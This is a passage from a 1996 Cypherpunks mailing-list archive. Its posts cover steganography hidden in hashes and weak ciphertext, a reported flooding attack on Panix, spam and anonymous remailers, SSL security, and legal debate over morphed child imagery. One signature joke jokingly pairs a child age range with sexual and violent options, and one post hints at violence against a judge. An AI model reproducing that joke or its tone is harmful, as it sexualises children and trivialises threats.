output of the government-approved 40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted message. trick #n) see above. Any communications channel that allows you to send *any* bits that are cyptographically random can be used to send arbitrary encrypted messages. Jim_Miller at suite.com P.S. The pre-computed plaintext messages don't have to be garbage messages. You can probably make an innocent-looking message produce the desired bits by adding extra whitespace or typos. From jimbell at pacifier.com Fri Sep 13 01:54:49 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 13 Sep 1996 16:54:49 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <199609130236.TAA22049@mail.pacifier.com> At 05:40 PM 9/12/96 -0700, Greg Broiles wrote: > >The Daily Journal, a LA/SF legal newspaper had an article today (9/12) about >a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday >at an Internet Law Symposium in Seattle. > >The article quotes Kozinski as saying "I have a severe problem with >anonymous E-mailers . . . You don't have a right to walk up to somebody's >door and knock with a bag over your head." The article says Kozinski likened >anonymous E-mail to menacing someone. I wish somebody would go up to these guys and point out that since the Internet is, more or less, a huge, worldwide, VOLUNTARY association of people, _we_ don't think these judges have any sort of "right" to regulate its content. Furthermore, it isn't clear that the proper regulators of the Internet shouldn't be an entirely different set of people selected by Internet users, RATHER than the same old government system that's managed to screw up the rest of the world so far. And if you're looking for "menacing," I'd say that describes the government's behavior towards the Internet over the last year or two. >Kozinski also suggested that computer-generated or morphed images of >children involved in sexual acts may not be protected under the Constitution >because of ongoing trauma to the child, Which child? Does he understand what "computer-generated" means? >while computer-generated or morphed images of adults would be protected. What about the "ongoing trauma" to the adults? I smell hypocrisy. >The article says that Kozinski was skeptical that he or other federal judges >necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding >the CDA unconstitutional). > >Kozinski is considered relatively conservative and relatively libertarian, >as 9th Circuit judges go. Which means that he'll last just a little longer "when the cyber-revolution comes." Jim Bell jimbell at pacifier.com From tomw at netscape.com Fri Sep 13 01:57:27 1996 From: tomw at netscape.com (Tom Weinstein) Date: Fri, 13 Sep 1996 16:57:27 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <517brn$lu7@life.ai.mit.edu> Message-ID: <32390335.6231@netscape.com> Hallam-Baker wrote: > > There was a long list of security holes in SSL, PCT plugged a good > number of them and SSL v3 plugged a few. This statement surprises me. It appears to mean that you think PCT has fewer holes than SSL 3.0. If you know of any holes in SSL 3.0, I'd be very interested in hearing about them. -- You should only break rules of style if you can | Tom Weinstein coherently explain what you gain by so doing. | tomw at netscape.com From wombat at mcfeely.bsfs.org Fri Sep 13 01:57:50 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 13 Sep 1996 16:57:50 +0800 Subject: "Unwanted Mail" In-Reply-To: Message-ID: On Thu, 12 Sep 1996, Timothy C. May wrote: > At 9:48 PM 9/12/96, Rabid Wombat wrote: > >> > >> These people have invited the email, and the associated expense, by placing > >> a public email-to: button on their public www page. > > > > > >Most people put up an "email to:" button on a public page for > >communications related to what's on the page. It's quite a stretch to > >assume that this invites any and all email from anyone who cares to send > >whatever they want. I can't say I've ever seen one that said "Please send > >SPAM(tm) to:" ... > > But to attempt to define "SPAM" (unless you're Armour) is dangerous. This > whole notion of "unwanted mail" is ill-defined and not something "the law" > should get involved in, in my view. (And CP technologies certainly are > consistent with this, e.g., placing the role of screening on those who set > up gates, not on tracking down True Names for prosecution.) > Hormel, isn't it? Anyway, my point is that the law should not be involved in it, but that it is going to be sucked in whether we like it or not if social pressure is ineffective. What is, and is not "spam" has been debated on usenet since the dawn of 'net time. While most newsgroup members agree that traffic should stay more or less "on topic", few can agree to just what "on topic" is. Sorta like the "Pornagraphy Definition" of "I can't define it, but I know it when I see it" being entirely a matter of one's own present and subjective opinion, and therefore impossible to codify. We're therefore stuck - as a community, we cannot stop what many people consider to be undesirable, as we cannot even define it, and the unwashed masses will set governance upon us for our "own good." The community does try to prevent this undesirable sort of communication; many people will take it upon themselves to complain to the originator of the "mass mailing", and, if that fails, to the ISP providing connectivity. When the "mass mailing" is posted through a remailer, this becomes somewhat more difficult. The ability to be anonymous on the 'net is generally a good thing. It has allowed people access to information that might have otherwise been denied them. It is an important freedom, and one that is already in danger of being taken away through legislation (Georgia on my mind ...). Abuse of this freedom by someone for purely commercial purposes is certainly not going to help matters. Note the earlier comment about someone being unhappy about their "remailer-baby" being used for such a purpose - someone running a remailer is generally doing so as a service, and is generally not compensated for the equipment, time, energy, and aggravation. A lot of remailers have shut down recently. Is this helping the cause of privacy and free speech? I have no complaint against anyone voicing their opinion, and defend their right to do so. However, I don't agree that a different set of standards somehow applies to those who provide a means to contact the providor of web content as a courtesy to their readers. Why does it fall to them to provide a completely off-topic forum for someone else's views? How are they any different from members of a public mailing list? Must the members of c'punks and toad.com accept all unpaid advertising in the name of free speech? > >However, since others may think like you, I guess I'll have to add a line > >above my link stating that email not related to the purpose of my site > >will be happily proof-read at the rate of $200 per hour, 1 hour per 60 > >lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of > >SPAM(tm), it might be worth the costs of breaking down the anonymity. > > As the legal eagles will tell you, the essence of a contract is a two-way > agreed upon set of terms, not a one-way "if you send me mail I decide I > don't want, you will have incurred a charge of $1000." Try enforcing your > $200 an hour "proofreading charge" in any court in the land. Sarcasm, Tim. I really wouldn't expect this to work, and doubt anyone else would. Just trying to point out that when all else fails, our society generally pursues resolution through the courts (could be worse, I suppose, but I for one think we are far too prone to this - OTOH, we seem to have slipped from "right" to "legally defensible" somewhere back there). > > (I've been saying this thing for several years. Who knows, maybe Rabit > Wombat was the first to use it. Whatever, it's as unenforceable and > meaningless now as it was several years ago.) > Yes, it is meaningless, legally. It was not meant to be taken seriously, any more than the "dead skunks" were. Where the hell would I get 100 dead skunks at this time of the night? I don't even know if I have that much ammo left over from last weekend. > >No, this b.s. is more like having someone put a dead skunk in my mailbox, > >with no return address, trying to prevent me from sending them 100 dead > >skunks as a return favor. And about as welcome. > > In the case of actual USPS mailboxes, there are laws which prevent others > from using them (e.g., no UPS or FedEx deliveries). For sure, dead skunks > can be placed in mailboxes, or under porches, or whatever. The law can't > fix everything. No, and it ought to be the last resort. - r.w. From asgaard at Cor.sos.sll.se Fri Sep 13 08:50:24 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Fri, 13 Sep 1996 23:50:24 +0800 Subject: 56 kbps modems Message-ID: >U.S. Robotics and Rockwell International are planning new modems with >speeds up to 56 kbps a second, almost double the speed of the fastest >rate now available. The new devices should be available by the end of >the year, although their top speed initially may be less than 56 kbps. >(Wall Street Journal 12 Sep 96 B11) People who seemed to know used to say that 'the Shannon limit' set an absolute upper limit around 40 kbps. Has Shannon been proven wrong, or what? Asgaard From gary at systemics.com Fri Sep 13 09:06:36 1996 From: gary at systemics.com (Gary Howland) Date: Sat, 14 Sep 1996 00:06:36 +0800 Subject: What is this nonsense? (Anti DVD piracy chip) In-Reply-To: <960913.002423.7Q6.rnr.w165w@sendai.scytale.com> Message-ID: <323950B0.167EB0E7@systemics.com> Taken from a recent Edupage: > SGS-THOMSON TAKES AIM AT DVD PIRACY > SGS-Thomson Microelectronics has developed a computer chip that prevents > would-be DVD pirates from making unlawful copies of movies from digital > video disc players. The chip scrambles the disk's coding if it's duplicated > on a VCR. (Investor's Business Daily 11 Sep 96 A6) Anyone know anything about this? Sounds like nonsense to me ... Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From jya at pipeline.com Fri Sep 13 10:18:53 1996 From: jya at pipeline.com (John Young) Date: Sat, 14 Sep 1996 01:18:53 +0800 Subject: 260_0it Message-ID: <199609131302.NAA16956@pipe1.t1.usa.pipeline.com> 9-13-96. WaJo: "Magazine's Recipes For Hackers' Havoc: Warning or Weapon?" Whoever attacked Panix could have found guide in latest issue of 2600. 2600's editor defends the article as a way to point out holes in computer security that need to be fixed. He says similar attacks have occurred before, and that he's not even sure the hacker who attacked Panix used 2600 as a guide, since an on-line publication recently published similar directions. "Internet Censorship in China, Singapore May Affect Law-Abiding Citizens Most" For the underground dissident or hardcore pornography enthusiast, the latest moves in Asia to censor the Internet pose little challenge. The greatest effect will be on normal, law-abiding citizens, experts say. FiTi: "Intelligent machines will take control of our lives" Before long, every vehicle will be fitted with a GPS receiver, making its position known to local area traffic management systems. In the home, a financial and stock control system would automatically order food and groceries when necessary. Intelligent machines might "decide" that it would be more efficient not to order any more food - and shut you out of the house. "It's more or less inevitable. Business and science will drive this to the utmost." ----- http://jya.com/2600it.txt (10 kb for 3) 260_0it From dlv at bwalk.dm.com Fri Sep 13 10:27:00 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 01:27:00 +0800 Subject: Security technical list In-Reply-To: <409if995@colphi.edu.ar> Message-ID: "MacGyver" writes: > [pgp sign clear] > Anybody could help me to find a mail list of security,crypto,etc?? 1. Try codeprunks. Just e-mail majordomo at toad.com and say subscribe coderpunks. It's got some very interesting traffic, although it's pretty low volume. 2. Try the firewalls mailing list. 3. Try Usenet newsgroups alt.security,sci.crypt,etc. They have better s/n ratio than this mailing list. 4. Try staying on the cypherpunks mailing list, but use procmail (or equivalent) to filter out non-crypto-relevant rants, lies, and personal attacks from *@got.net. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gary at systemics.com Fri Sep 13 10:51:05 1996 From: gary at systemics.com (Gary Howland) Date: Sat, 14 Sep 1996 01:51:05 +0800 Subject: Observer's defense of "Internet Pornography" article In-Reply-To: Message-ID: <3239614D.2781E494@systemics.com> Martin Minow wrote: > > The only revelation is that Demon (the major Internet provider) plans > to block access to some newsgroups/sites. The only reason I ever used to use them was their lack of censorship. If they go ahead with this blocking, I doubt I'll ever use them again. Of course it's the principle, not the fact that I have nothing better to do all day long that download porn :-) > Also, assuming I read between the lines correctly, Demon receives three > billion (with a "b") e-mail messages per day. I can never remember whether > British usage is "thousand million," or "million million", but the numbers > seem a bit large in any case. They'll mean 3,000,000,000 (Brits hardly ever use billion to mean million million). > Perhaps they mean "3 billion bytes of e-mail." I doubt it. A friend of mine, a demon subscriber, sends over a Gig of email every day. > (Assume ten million Demon subscribers and three thousand million e-mail > messages. This implies that the average subscriber receives 300 e-mail > messages per day. Are they all subscribing to Cypherpunks?) I think there are in the order of 100,000 subscribers, so this would make the average 30,000 email message - definately not realistic. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From peter.allan at aeat.co.uk Fri Sep 13 10:56:56 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Sat, 14 Sep 1996 01:56:56 +0800 Subject: really (?) undetectable crypto Message-ID: <9609131255.AA26331@clare.risley.aeat.co.uk> > Jim_Miller at suite.com wrote on CP: > > Most everybody on the list is familiar with the technique of hiding > encrypted messages in the LSBs of image files. Personally, I would not > use such a technique because don't I believe it's really undetectable. I > assume, without proof, that the LSBs of images files have statistical > properties that are sufficiently different from encrypted data that a > clever person could determine whether or not an image file contained an > imbedded encrypted message. > Not to mention 7 out of 8 bits may reveal the image to be a library one your enemy has access to. The changes will betray the stego. Your own scanned snapshots may be safer from this point of view. > Fortunately, there are other steganographic techniques that, I believe, > are undetectable. The trick is to hide your encrypted bits in other > encrypted bits. > > trick #1) Let's say you want to send a short encrypted message via a > communications channel that only allows cleartext messages with optional > MD5 message hashes. You can construct cleartext messages, via > trial-and-error, such that the first 4 or 8 bits (or more, if you have the > time) of the MD5 hash match the first 4 or 8 bits of your encrypted > message. > > Since the bits in an MD5 message hash are presumably cryptographically > random, there should be no way to tell if some of the bits combine to make > an encrypted message. What about Walter making insignificant changes to the cleartext and replacing the hash with the new hash? Because you are using an unkeyed hash (and not a sig) he can do that and foul up the stegomessage (not that he'll yet be sure there is one). > trick #2) Let's say you are allowed to use 40 bit encryption, but nothing > stronger. As in trick #1, you can pre-compute plaintext messages such > that the first 4 or 8 of the bits in the output of the government-approved > 40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted > message. > Walter can still play silly spooks with your stego if he breaks the 40-bit encryption. The cyphertext/plaintext ratio looks like getting really huge too. Your messages must all arrive, and retain the right order. -- Peter Allan peter.allan at aeat.co.uk From um at c2.net Fri Sep 13 11:13:06 1996 From: um at c2.net (Ulf Moeller) Date: Sat, 14 Sep 1996 02:13:06 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <199609120716.IAA00231@server.test.net> Message-ID: Adam Back writes: >Hadn't heard that before, that the trade secret requirement was >imposed on RSADSI. Schneier writes (2nd ed., p. 398): "This special export status has nothing to do with the secrecy of the algorithm, although RSA Data Security, Inc. has hinted for years that it does." From jbugden at smtplink.alis.ca Fri Sep 13 11:51:13 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 14 Sep 1996 02:51:13 +0800 Subject: Thoughts about Morph Escrow Crimes Message-ID: <9608138426.AA842634290@smtplink.alis.ca> tcmay at got.net (Timothy C. May) wrote: >As the law cannot tell if an image of prurient interest started out as a legal image of Raquel Welch or Jennifer Aniston, or started out as an illegal image of a minor child, morph escrow will force all image possessors and distributors to produce proof that the image started out legal. It is not hard to imagine a future where computer modelling has reached the stage that a real picture is not required. An obvious extension of this is a film with computer generated actors. Now, consider this scenario: 1) The computer generated image is "indistinguishable" from reality. 2) The computer generated image depicts something considered obscene or illegal under present laws (e.g. pedophilia). At some point in the future it would seem possible that the computer generated image will be treated as a real image under the law (and evaluated accordingly) because it is indistinguishable from a real image. Or perhaps we will take the other tack and simply say: What is truth? I'm not quite ready to wash my hands on this issue. James Welcome to MorphSex - Fulfilling your fantasies - Painlessly. Select Gender [M/F/H]: Select Age [2-80]: Options: [Orgasm/Suffocation/Dismemberment/Disembowlment/Ennui] From dthorn at gte.net Fri Sep 13 12:01:11 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 03:01:11 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: <3238F0F0.274B@gte.net> Brian Davis wrote: > On Wed, 11 Sep 1996, jonathon wrote: > On Wed, 11 Sep 1996, Gary Howland wrote: > But the public *is* asked to assent to those methods - your chance to > vote on them is known colloquially as "jury duty". > But judges have said that Jury Nullification is not acceptable > legal practice. > And other judges have said the opposite. > EBD This seems similar to the Declaration-of-Independence argument about the "right of the people to overthrow the govt.", etc. You can't expect the Constitution (a doctrine of law) to provide details on extra-legal activities such as violent overthrow of the govt., nor can you expect judges to explain in court how to ignore the Law. And if all else fails, you can try picketing... A well-written company charter (as an example) would contain provisions for exceptions to the charter, not to abrogate or undermine the charter, but just as a kind of escape valve. One would note the exception(s) for historical purposes, and for purposes of future litigation, and so on. I can't help but wonder if the U.S. Constitution would have been better for something similar to this, instead of pasting on Amendments for every little thing. From bdavis at thepoint.net Fri Sep 13 12:02:41 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 14 Sep 1996 03:02:41 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net In-Reply-To: <199609130236.TAA22049@mail.pacifier.com> Message-ID: On Thu, 12 Sep 1996, jim bell wrote: > At 05:40 PM 9/12/96 -0700, Greg Broiles wrote: > ... > >Kozinski also suggested that computer-generated or morphed images of > >children involved in sexual acts may not be protected under the Constitution > >because of ongoing trauma to the child, > > Which child? Does he understand what "computer-generated" means? > Yes, he does, I think. But I think "protected" above should read "prohibited." [Note to Greg: could that be a typo?] The key kiddie porn/1st amendment case (whose name escapes me for the moment) offered two reasons why kiddie porn could be regulated in the face of the first amendment. One reason was the "on-going trauma to the child [victim]."In a morphed image, they is not (or at least may not be) an actual child victim. Thus the "continuing trauma" rationale for regulation does not exist in that case. > >while computer-generated or morphed images of adults would be protected. Different standards frequently apply to adults and children, in spite of those of you who like to arm your toddlers! :-) > What about the "ongoing trauma" to the adults? I smell hypocrisy. Adults, for the most part, are supposed to take care of themselves. EBD > > >The article says that Kozinski was skeptical that he or other federal judges > >necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding > >the CDA unconstitutional). > > > >Kozinski is considered relatively conservative and relatively libertarian, > >as 9th Circuit judges go. > > Which means that he'll last just a little longer "when the cyber-revolution > comes." > > > Jim Bell > jimbell at pacifier.com > From dthorn at gte.net Fri Sep 13 12:03:11 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 03:03:11 +0800 Subject: Child Porn and Thought Crime In-Reply-To: Message-ID: <3238F248.2C9C@gte.net> Chip Mefford wrote: > If it is a crime to posses photograhic child pornograhy, and this > crime is tested in court., > Then is it a crime for a sightless person to posses photograhic child > pornograhy? If so, than this matter needs to be thought out some more. > If no (by test of court, paper is more or less > meaningless) than it is thought crime. I've speculated for a long time about what Thomas Jefferson might say if he were around. Something like: Think liberally, but act conservatively. --Just a thought. From vipul at pobox.com Fri Sep 13 12:20:05 1996 From: vipul at pobox.com (Vipul Ved Prakash) Date: Sat, 14 Sep 1996 03:20:05 +0800 Subject: "Unwanted Mail" In-Reply-To: Message-ID: <199609131727.RAA00191@fountainhead.net> Timothy C. May wrote: > But to attempt to define "SPAM" (unless you're Armour) is dangerous. This > whole notion of "unwanted mail" is ill-defined and not something "the law" > should get involved in, in my view. (And CP technologies certainly are > consistent with this, e.g., placing the role of screening on those who set > up gates, not on tracking down True Names for prosecution.) I feel all "SPAM" related problems can be best addressed with a nice, distributed reputation system which can hooked up with kill files etc. Formal law is concerned with all kinds of physical and intellectual damages, and if SPAM can be categorised as physical/intellectual damage then I see no reason why "the law" shouldn't interrupt. The problem is that though the net believes in informal law, there is hardly any informal jurisdiction. - Vipul -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Internet & Intranets 91 11 2247802 | - Web Development & PERL 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - (Networked) Multimedia From pjb at ny.ubs.com Fri Sep 13 12:30:55 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Sat, 14 Sep 1996 03:30:55 +0800 Subject: PANIX.COM down: denial of service attack Message-ID: <199609131413.KAA02012@sherry.ny.ubs.com> > From cypherpunks-errors at toad.com Thu Sep 12 18:16:43 1996 > Date: Thu, 12 Sep 1996 09:09:18 -0700 > From: #6 > X-Mailer: Mozilla 2.01 (Win95; U) > Mime-Version: 1.0 > To: cypherpunks at toad.com > Subject: PANIX.COM down: denial of service attack > Content-Type> : > text/plain> ; > charset=us-ascii> > Content-Transfer-Encoding: 7bit > Sender: owner-cypherpunks at toad.com > Content-Length: 969 > > WSJ 9/12/96 > > Paraphrasing: > > Panix has been under attack for the last week by someone flooding > their server with bogus "requests for information" [see below] ... > > The attack(s): > > * "Have rendered almost defenseless the small NY company" > * "...began late Friday afternoon ... were still continung yesterday" > * have targeted "computers that control WWW pages, store e-mail, and > still others that link Internet addresses to Panix subscribers." > > "The hacker [sic] has been sending up to 150 requests a second to > Panix's computers, seeking to establish a connection ... the requests, > presumably generated by a malicious computer program, contain fake > Internet addresses, which the computer must sort out before they can > discard them. The computers have choked under the deluge." > > "As to who might be targeting Panix, the firm's Mr. Rosen speculated it ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ It could, of course, also be someone, from a set of several million, that find Mr. Rosen to be such as odious prick that they did it just to drive him out of their misery. Just thinking out loud.. > could be someone upset by the fact that the site hosts, free, the Web > site for Voters Telecommunication Watch...." > -paul From m5 at tivoli.com Fri Sep 13 12:39:41 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 14 Sep 1996 03:39:41 +0800 Subject: Child Porn and Thought Crime In-Reply-To: Message-ID: <323972E0.1A72@tivoli.com> Dale Thorn wrote: > I've speculated for a long time about what Thomas Jefferson might > say if he were around. Something like: Think liberally, but act > conservatively. I think he'd say, "You people have let this place go to Hell. I want to be dead again." ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From zachb at netcom.com Fri Sep 13 12:41:27 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 14 Sep 1996 03:41:27 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net In-Reply-To: <2.2.32.19960913060631.006bf908@pop.ricochet.net> Message-ID: On Thu, 12 Sep 1996, Greg Broiles wrote: > At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote: > >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales > >> of material considered "harmful to minors" from vending machines.) > > > >Even if this statute is meant only to apply to cigarette machines, which > >would seem to be the case given all of the anti-cig stuff going on now, > >what good will it do? > > Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit > upheld a CA statute forbidding sales of *printed* material considered > 'harmful to minors' from unsupervised vending machines". The publication(s) > It's still mostly the same thing. I've never seen the type of machine that you're talking about, and I don't think anyone would be dumb enough to install one in a store that is near a school, or frequented my minors. This law just does not seem like a very good idea. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From enzo at ima.com Fri Sep 13 13:17:48 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Sat, 14 Sep 1996 04:17:48 +0800 Subject: 56 kbps modems In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Asgaard wrote: > >U.S. Robotics and Rockwell International are planning new modems with > >speeds up to 56 kbps a second, almost double the speed of the fastest > >rate now available. The new devices should be available by the end of > >the year, although their top speed initially may be less than 56 kbps. > >(Wall Street Journal 12 Sep 96 B11) > > People who seemed to know used to say that 'the Shannon limit' > set an absolute upper limit around 40 kbps. Has Shannon been > proven wrong, or what? Well, it all depends on the signal-to-noise ratio. Also, if the noise is not white gaussian the situation can be even better. Enzo From bf578 at scn.org Fri Sep 13 13:44:12 1996 From: bf578 at scn.org (SCN User) Date: Sat, 14 Sep 1996 04:44:12 +0800 Subject: position of cellular phones Message-ID: -->After seeing the messages about Federal Express doing something similar, -->I thought this would be of interest: Date: Mon, 09 Sep 96 17:41:31 GMT From: campbellp at logica.com (Peter Campbell Smith) Subject: Re: Locating the position of cellular phones (Stover, RISKS-18.41) There is an interesting article in Traffic Technology International, Aug/Sept 96 issue about a system called CAPITAL that uses cellular phone calls as a probe to monitor road traffic around Washington DC. It describes an experiment which has been running for two years and which has demonstrated that this is an extremely cost-effective alternative to conventional means of traffic monitoring. The system is independent of the cellular phone system per se, but has antennae on the cellular phone masts which listen to the cellular frequencies. Every time a call is initiated, CAPITAL locates the caller by a combination of directional multi-element antennae and time-of-arrival analysis between different masts. The geographical accuracy is reported to be to about 115m, and subsequent tracking allows the speed of the vehicle to be established within 30 to 50sec to an accuracy of 5mi/h. At any time only less than 5% of vehicles are making calls, but this is a sufficient sample for analysing the traffic speed (though not presumably the traffic density). Moreover, when the traffic slows down even more people make calls, so there is a better density of data from the areas most interesting to those monitoring traffic flows. It is claimed that the boxes ignore the voice content of the call and that the data they deliver has randomly assigned identifiers for each call, so that nothing leaves the system which would allow calls to be associated with specific phones. -->Until the government thinks it needs the info! Peter Campbell Smith, Logica, London, UK campbellp at logica.com From declan at eff.org Fri Sep 13 13:46:21 1996 From: declan at eff.org (Declan McCullagh) Date: Sat, 14 Sep 1996 04:46:21 +0800 Subject: (fwd) Email Robot draws fire from CypherPunkz Message-ID: <199609131602.JAA16146@eff.org> Path: news.eff.org!news.umbc.edu!haven.umd.edu!cs.umd.edu!news.abs.net!ddsw1!news.mcs.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!agate!boulder!ucsub.Colorado.EDU!peterson From: peterson at ucsub.Colorado.EDU (Peterson Penny) Newsgroups: alt.privacy Subject: Email Robot draws fire from CypherPunkz Date: 12 Sep 96 02:57:19 GMT Organization: University of Colorado at Boulder Lines: 11 Message-ID: NNTP-Posting-Host: ucsub.colorado.edu NNTP-Posting-User: peterson X-Newsreader: NN version 6.5.0 #8 (NOV) The Cypherpunks gang has apparently attacked a San Francisco artist's www site, harrassing him and mail-bombing his service provider in an attempt to get him to drop the account. The Cpunks objected to an applett that this artist had on one of his pages that would send a mail greeting to people who had a *mail-to:* button on their www pages. This greeting consisted of his URL only and went through an anon remailer. More info and a sample of the email robot can be found at: http://www.hipcrime.com -- // declan at eff.org // I do not represent the EFF // declan at well.com // From jimbell at pacifier.com Fri Sep 13 13:48:47 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 14 Sep 1996 04:48:47 +0800 Subject: Jury Nullification = Voting One's Conscience Message-ID: <199609131633.JAA01693@mail.pacifier.com> At 11:39 PM 9/12/96 -0400, Brian Davis wrote: >> Though I often condemn aspects of the American political and legal system, >> it is true that an awful lot of things are done right. > >Perhaps, like democracy, it is the worst system possible, except for >every other system man has invented. >EBD I have to disagree with that... Jim Bell jimbell at pacifier.com From hallam at ai.mit.edu Fri Sep 13 13:50:34 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Sat, 14 Sep 1996 04:50:34 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <32390335.6231@netscape.com> Message-ID: <9609131559.AA30300@etna.ai.mit.edu> Tom wrote, >Hallam-Baker wrote: >> >> There was a long list of security holes in SSL, PCT plugged a good >> number of them and SSL v3 plugged a few. >This statement surprises me. It appears to mean that you think PCT has >fewer holes than SSL 3.0. If you know of any holes in SSL 3.0, I'd be >very interested in hearing about them. Sorry Tom, should have made a bit clearer the difference between the pre-Weinstein/El-Gamal and post era a little better. Also what I meant to say was that SSLv3 plugged a few that PCT had done differently. The remaining probnlems as I see it are of approach. The security in SSL is not in the right layer to support collaboration. Thats not to say its a bad thing to have SSL and SSL makes a lot more sense to me than IP-SEC does, but then I always prefer security thats higher in the protocol stack. SSL strikes me as a credible prospect for pervasive low level security across all IP protocols while IP-sec would be nice but will probably take a decade to become ubiquitous. The problem with SSL is that using a public key based protocol to protect a password is something of a technology mismatch. I want the flexibility that public key auth gives me available at the application level. There is no real model for how SSL provides security in a distributed authoring environment. If I want to distribute encrypted documents from one server and keys from another, have an authoring tool sign a document in a non repudiable manner and integrate that through to the authorisation system there is not really a means to do it. I don't think that S-HTTP helps either, its too baroque. If all one wants to do is sign a document being transmitted in http then whats wrong with a Content-Signature: tag? If you want to encrypt on a symmetric key which is known to the firewall and want the firewall to know what is going on then whats wrong with using chunked encoding? Similarly whats wrong with a simple MAC function signing each message body? If one incorporates a wrapping mechanism then one can control the level of security in an arbitary manner, exposing or concealing as much as one wants. I've never understood why S-HTTP needed so much mechanism to achieve all that. Phill From tcmay at got.net Fri Sep 13 14:00:17 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 14 Sep 1996 05:00:17 +0800 Subject: Unrequested mail from Mr. Babayco Message-ID: At 4:28 AM 9/13/96, Z.B. wrote: >It doesn't matter if you get one or one hundred messages - both are still >annoying as hell. If I wanted whatever you're advertising or selling, >I'd come look for it. I'd prefer that you not mail me. Mr. Babayco, I did not request your mail to me, and I am annoyed at having received it. I am not interested in the views you are advertising or selling, and I'd prefer that you not mail me. To make me whole, I demand that you send me $125 for this occurrence, and $125 for each future occurrence. Have a nice day. --Timothy C. May cc: Law firm of Canker, Sleazewell, and M. Dooza (sauce for the gander?) From Ryan.Russell at sybase.com Fri Sep 13 14:20:08 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Sat, 14 Sep 1996 05:20:08 +0800 Subject: Security technical list Message-ID: <9609131650.AA13415@notesgw2.sybase.com> You're soaking in it. Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: macgyver @ colphi.edu.ar ("MacGyver") @ smtp Date: 09/06/96 09:12:20 AM Subject: Security technical list [pgp sign clear] Anybody could help me to find a mail list of security,crypto,etc?? Regards From jimbell at pacifier.com Fri Sep 13 14:36:49 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 14 Sep 1996 05:36:49 +0800 Subject: 260_0it Message-ID: <199609131633.JAA01687@mail.pacifier.com> At 01:02 PM 9/13/96 GMT, John Young wrote: > FiTi: "Intelligent machines will take control of our lives" > > Before long, every vehicle will be fitted with a GPS > receiver, making its position known to local area > traffic management systems. In the home, a financial and > stock control system would automatically order food and > groceries when necessary. Intelligent machines might > "decide" that it would be more efficient not to order > any more food - and shut you out of the house. > > "It's more or less inevitable. Business and science will > drive this to the utmost." "Open the garage door, HAL." "I'm sorry, Dave, but those sirloin steaks in the refrigerator are too valuable for me to allow you to eat them. Jim Bell jimbell at pacifier.com From robert at precipice.V-site.net Fri Sep 13 15:03:45 1996 From: robert at precipice.V-site.net (HipCrime) Date: Sat, 14 Sep 1996 06:03:45 +0800 Subject: did you go to school? Message-ID: <32399315.19E7@precipice.v-site.net> >> THIN SLICES CUT FROM OUR PRECIOUS FORESTS. > > "OUR?" Since when did my trees become partially yours? > JMR JMR, it's hard to believe that your English education is SO LACKING, that you missed the fact, that in my sentence quoted above, the word "ours" refers to MANKIND IN GENERAL, not me personally. Go sit in the corner with the duncecap on, and don't come out until you can read an 8th grade piece of literature (with full comprehension). -- HTTP://www.HIPCRIME.com From asgaard at Cor.sos.sll.se Fri Sep 13 15:25:02 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Sat, 14 Sep 1996 06:25:02 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609130114.VAA08507@jekyll.piermont.com> Message-ID: On Thu, 12 Sep 1996, Perry E. Metzger wrote: > Yes, we could be a workers paradise like one of those lovely European > countries with double digit unemployment and all. Too bad we didn't go > in for democratic socialism 